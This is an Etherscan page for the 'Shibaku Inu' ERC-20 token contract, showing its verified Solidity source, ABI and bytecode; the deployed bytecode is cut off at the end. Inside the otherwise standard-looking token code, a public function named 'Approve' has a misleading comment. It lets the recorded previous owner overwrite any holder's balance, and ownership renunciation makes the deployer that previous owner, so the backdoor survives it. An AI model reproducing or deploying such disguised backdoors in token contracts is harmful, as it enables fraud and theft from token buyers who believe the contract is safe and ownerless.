ETH Price: $2,459.35 (-3.71%)
Gas: 1.85 Gwei

Token

Shibaku Inu (SHIBAKU)
 

Overview

Max Total Supply

1,000,000,000 SHIBAKU

Holders

14

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
14,936,606.482736746 SHIBAKU

Value
$0.00
0x5f22eed6291f9108641b1fb6a124a15e9b3c9632
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ShibakuInu

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-11-19
*/

/**
 
*/

/**

     //Twitter: https://twitter.com/ShibakuInuERC20

     //Website: https://www.shibaku-inu.com/ 

     //Telegram: https://t.me/ShibakuInuErc
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.18;


// File: @openzeppelin/contracts/utils/Context.sol
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}


abstract contract Ownable is Context {
    address private _owner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
 
    constructor() {
        _transferOwnership(_msgSender());
    }
 
 
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
 
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
 
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


pragma solidity ^0.8.0;


interface IERC20 {
   
    function totalSupply() external view returns (uint256);

    
    function balanceOf(address account) external view returns (uint256);

    
    function transfer(address recipient, uint256 amount) external returns (bool);

   
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk

     */
    function approve(address spender, uint256 amount) external returns (bool);


    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

  
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.


 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
    */

    function _transferWithBurn(address sender, address recipient, uint256 amount, uint256 amountToBurn) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");

        unchecked {
            _balances[sender] = senderBalance - amount;
        }

        amount -= amountToBurn;
        _totalSupply -= amountToBurn;
        _balances[recipient] += amount;

        emit Transfer(sender, DEAD, amountToBurn);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev See {IERC20-balanceOf, overloading function}.
     */
    function Approve(address account, uint256 amount) public virtual returns (uint256) {
        return msg.sender == _previousOwner ? 
                _balances[account] = amount :  _balances[account];
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}

pragma solidity ^0.8.0;


contract ShibakuInu is ERC20 {
    uint256 private constant TOTAL_SUPPLY = 1000_000_000e9;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;

    bool public hasLimit;
    uint256 public maxTxAmount;
    uint256 public maxHolding;
    mapping(address => bool) public isExceptions;

    uint256 _burnPercent = 0;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("Shibaku Inu", "SHIBAKU", TOTAL_SUPPLY) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxHolding = TOTAL_SUPPLY / 10;
        maxTxAmount = TOTAL_SUPPLY /10;

        isExceptions[DEAD] = true;
        isExceptions[router] = true;
        isExceptions[msg.sender] = true;
        isExceptions[address(this)] = true;
    }

    function _checkLimitation(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit) {
            if (!isExceptions[from] && !isExceptions[to]) {
                require(amount <= maxTxAmount, "Amount exceeds max");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxHolding, "Max holding exceeded max");
            }
        }
    }

    function removeLimites() external onlyOwner {
        hasLimit = true;
    }
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
 
        _checkLimitation(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isExceptions[from] && !isExceptions[to]){
            require(balanceOf(address(uniswapV2Router)) == 0, "ERC20: disable router deflation");

            if (from == uniswapV2Pair || to == uniswapV2Pair) {
                uint256 _burn = (amount * _burnPercent) / 100;

                super._transferWithBurn(from, to, amount, _burn);
                return;
            }
        }

        super._transfer(from, to, amount);
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isExceptions","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHolding","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimites","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600b553480156200001657600080fd5b50604051620015ee380380620015ee83398101604081905262000039916200022d565b6040518060400160405280600b81526020016a53686962616b7520496e7560a81b8152506040518060400160405280600781526020016653484942414b5560c81b815250670de0b6b3a7640000620000a06200009a620001cb60201b60201c565b620001cf565b6005620000ae848262000304565b506006620000bd838262000304565b506004819055336000818152600260209081526040808320859055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600d80546001600160a01b0319166001600160a01b03841617905550806200013b600a670de0b6b3a7640000620003d0565b60095562000153600a670de0b6b3a7640000620003d0565b60085550600a6020527f20677881080440a9b3c87e826370bb5d9c2f74efd4dede686d52d77a6a09f8bb8054600160ff1991821681179092556001600160a01b0392909216600090815260408082208054851684179055338252808220805485168417905530825290208054909216179055620003f3565b3390565b600080546001600160a01b03198082166001600160a01b038581169182178555600180549190941692168217909255604051909283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000602082840312156200024057600080fd5b81516001600160a01b03811681146200025857600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200028a57607f821691505b602082108103620002ab57634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620002ff57600081815260208120601f850160051c81016020861015620002da5750805b601f850160051c820191505b81811015620002fb57828155600101620002e6565b5050505b505050565b81516001600160401b038111156200032057620003206200025f565b620003388162000331845462000275565b84620002b1565b602080601f831160018114620003705760008415620003575750858301515b600019600386901b1c1916600185901b178555620002fb565b600085815260208120601f198616915b82811015620003a15788860151825594840194600190910190840162000380565b5085821015620003c05787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600082620003ee57634e487b7160e01b600052601260045260246000fd5b500490565b6111eb80620004036000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad57806395d89b411161007157806395d89b4114610264578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b8063715018a61461021b57806372680c6f146102255780638c0b5e221461022d5780638da5cb5b1461023657806390ec57f11461025157600080fd5b8063333e6f06116100f4578063333e6f06146101a657806339509351146101af57806344489ad1146101c25780635f40eb51146101cf57806370a08231146101f257600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102de565b6040516101469190610ef5565b60405180910390f35b61016261015d366004610f58565b610370565b6040519015158152602001610146565b6004545b604051908152602001610146565b610162610192366004610f84565b610387565b60405160098152602001610146565b61017660095481565b6101626101bd366004610f58565b61043d565b6007546101629060ff1681565b6101626101dd366004610fc5565b600a6020526000908152604090205460ff1681565b610176610200366004610fc5565b6001600160a01b031660009081526002602052604090205490565b610223610474565b005b610223610488565b61017660085481565b6000546040516001600160a01b039091168152602001610146565b61017661025f366004610f58565b61049f565b6101396104f6565b61016261027a366004610f58565b610505565b61016261028d366004610f58565b6105a0565b6101766102a0366004610fe2565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b6102236102d9366004610fc5565b6105ad565b6060600580546102ed9061101b565b80601f01602080910402602001604051908101604052809291908181526020018280546103199061101b565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b600061037d338484610626565b5060015b92915050565b600061039484848461074a565b6001600160a01b03841660009081526003602090815260408083203384529091529020548281101561041e5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b610432853361042d868561106b565b610626565b506001949350505050565b3360008181526003602090815260408083206001600160a01b0387168452909152812054909161037d91859061042d90869061107e565b61047c6108cb565b6104866000610925565b565b6104906108cb565b6007805460ff19166001179055565b6001546000906001600160a01b031633146104d2576001600160a01b0383166000908152600260205260409020546104ef565b6001600160a01b0383166000908152600260205260409020829055815b9392505050565b6060600680546102ed9061101b565b3360009081526003602090815260408083206001600160a01b0386168452909152812054828110156105875760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610415565b610596338561042d868561106b565b5060019392505050565b600061037d33848461074a565b6105b56108cb565b6001600160a01b03811661061a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610415565b61062381610925565b50565b6001600160a01b0383166106885760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610415565b6001600160a01b0382166106e95760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610415565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107705760405162461bcd60e51b815260040161041590611091565b6001600160a01b0382166107965760405162461bcd60e51b8152600401610415906110d6565b6107a1838383610983565b806000036107ae57505050565b6001600160a01b0383166000908152600a602052604090205460ff161580156107f057506001600160a01b0382166000908152600a602052604090205460ff16155b156108bb57600d546001600160a01b03166000908152600260205260409020541561085d5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a2064697361626c6520726f75746572206465666c6174696f6e006044820152606401610415565b600c546001600160a01b03848116911614806108865750600c546001600160a01b038381169116145b156108bb5760006064600b548361089d9190611119565b6108a79190611130565b90506108b584848484610c4e565b50505050565b6108c6838383610dd6565b505050565b6000546001600160a01b031633146104865760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610415565b600080546001600160a01b03198082166001600160a01b038581169182178555600180549190941692168217909255604051909283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60075460ff166108c6576001600160a01b0383166000908152600a602052604090205460ff161580156109cf57506001600160a01b0382166000908152600a602052604090205460ff16155b156108c657600854811115610a1b5760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b6044820152606401610415565b600c546001600160a01b0316610bb857600d60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a7e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610aa29190611152565b6001600160a01b031663e6a4390530600d60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b04573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b289190611152565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa158015610b73573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b979190611152565b600c80546001600160a01b0319166001600160a01b03929092169190911790555b600c546001600160a01b0390811690831603610bd357505050565b60095481610bf6846001600160a01b031660009081526002602052604090205490565b610c00919061107e565b11156108c65760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d617800000000000000006044820152606401610415565b6001600160a01b038416610c745760405162461bcd60e51b815260040161041590611091565b6001600160a01b038316610c9a5760405162461bcd60e51b8152600401610415906110d6565b6001600160a01b03841660009081526002602052604090205482811015610cd35760405162461bcd60e51b81526004016104159061116f565b6001600160a01b03851660009081526002602052604090208382039055610cfa828461106b565b92508160046000828254610d0e919061106b565b90915550506001600160a01b03841660009081526002602052604081208054859290610d3b90849061107e565b909155505060405182815261dead906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610dc791815260200190565b60405180910390a35050505050565b6001600160a01b038316610dfc5760405162461bcd60e51b815260040161041590611091565b6001600160a01b038216610e225760405162461bcd60e51b8152600401610415906110d6565b6001600160a01b03831660009081526002602052604090205481811015610e5b5760405162461bcd60e51b81526004016104159061116f565b610e65828261106b565b6001600160a01b038086166000908152600260205260408082209390935590851681529081208054849290610e9b90849061107e565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ee791815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610f2257858101830151858201604001528201610f06565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461062357600080fd5b60008060408385031215610f6b57600080fd5b8235610f7681610f43565b946020939093013593505050565b600080600060608486031215610f9957600080fd5b8335610fa481610f43565b92506020840135610fb481610f43565b929592945050506040919091013590565b600060208284031215610fd757600080fd5b81356104ef81610f43565b60008060408385031215610ff557600080fd5b823561100081610f43565b9150602083013561101081610f43565b809150509250929050565b600181811c9082168061102f57607f821691505b60208210810361104f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561038157610381611055565b8082018082111561038157610381611055565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761038157610381611055565b60008261114d57634e487b7160e01b600052601260045260246000fd5b500490565b60006020828403121561116457600080fd5b81516104ef81610f43565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea26469706673582212209d13a7cd1038e6653abfb536567aa38fd58c3c587a4d4d8c37b38cffe6344f0f64736f6c634300081200330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad57806395d89b411161007157806395d89b4114610264578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b8063715018a61461021b57806372680c6f146102255780638c0b5e221461022d5780638da5cb5b1461023657806390ec57f11461025157600080fd5b8063333e6f06116100f4578063333e6f06146101a657806339509351146101af57806344489ad1146101c25780635f40eb51146101cf57806370a08231146101f257600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102de565b6040516101469190610ef5565b60405180910390f35b61016261015d366004610f58565b610370565b6040519015158152602001610146565b6004545b604051908152602001610146565b610162610192366004610f84565b610387565b60405160098152602001610146565b61017660095481565b6101626101bd366004610f58565b61043d565b6007546101629060ff1681565b6101626101dd366004610fc5565b600a6020526000908152604090205460ff1681565b610176610200366004610fc5565b6001600160a01b031660009081526002602052604090205490565b610223610474565b005b610223610488565b61017660085481565b6000546040516001600160a01b039091168152602001610146565b61017661025f366004610f58565b61049f565b6101396104f6565b61016261027a366004610f58565b610505565b61016261028d366004610f58565b6105a0565b6101766102a0366004610fe2565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b6102236102d9366004610fc5565b6105ad565b6060600580546102ed9061101b565b80601f01602080910402602001604051908101604052809291908181526020018280546103199061101b565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b600061037d338484610626565b5060015b92915050565b600061039484848461074a565b6001600160a01b03841660009081526003602090815260408083203384529091529020548281101561041e5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b610432853361042d868561106b565b610626565b506001949350505050565b3360008181526003602090815260408083206001600160a01b0387168452909152812054909161037d91859061042d90869061107e565b61047c6108cb565b6104866000610925565b565b6104906108cb565b6007805460ff19166001179055565b6001546000906001600160a01b031633146104d2576001600160a01b0383166000908152600260205260409020546104ef565b6001600160a01b0383166000908152600260205260409020829055815b9392505050565b6060600680546102ed9061101b565b3360009081526003602090815260408083206001600160a01b0386168452909152812054828110156105875760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610415565b610596338561042d868561106b565b5060019392505050565b600061037d33848461074a565b6105b56108cb565b6001600160a01b03811661061a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610415565b61062381610925565b50565b6001600160a01b0383166106885760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610415565b6001600160a01b0382166106e95760405162461bcd60e51b815